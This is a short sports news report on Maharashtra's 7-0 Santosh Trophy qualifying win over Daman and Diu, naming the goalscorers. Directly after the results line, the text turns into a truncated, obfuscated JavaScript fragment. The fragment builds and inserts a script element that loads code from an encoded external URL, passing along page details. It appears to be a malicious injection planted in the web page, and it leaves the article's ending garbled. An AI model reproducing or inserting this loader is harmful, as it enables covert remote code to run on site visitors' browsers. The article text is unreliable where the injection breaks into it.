Leading from the front striker Aaron DaCosta scored two goals as Maharashtra made a positive start romping to a facile 7-0 win against Daman and Diu in the opening qualifying round match of the AIFF 72nd National Football Championship for the Santosh Trophy to be held at Ahmedabad, Gujarat on Tuesday.

Maharashtra, who were dominant from the start enjoyed the lionsa share of the exchanges and went into the break with a comfortable 3-0 cushion. They could have won by a bigger margin had they been more accurate with their attempts on goal and they were also guilty of missing a penalty when Mervin Stephen failed to convert in the eighth minute.

However, two minutes later DaCosta opened the scoring and later he was again on target scoring the second in the 35th minute before Advait Shinde netted the third in the 39th minute.

Daman and Diu put up quite a good show and defended quite well as Maharashtra could score the remaining four goals in the last 15 minutes. Aniket Joshi (76th min), Linekar Machado (82nd min), Stephen (86th min and Dion Menezes (90th min) scoring the remaining four goals to complete the winning tally.

Results: Maharashtra 7 (Aaron DaCosta 2, Advait Shinde, Aniket Joshi, Linekar Machado, Mervin Stephen, Dion Menezes) beat Daman and Diu 0. 4\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}


Leave A Reply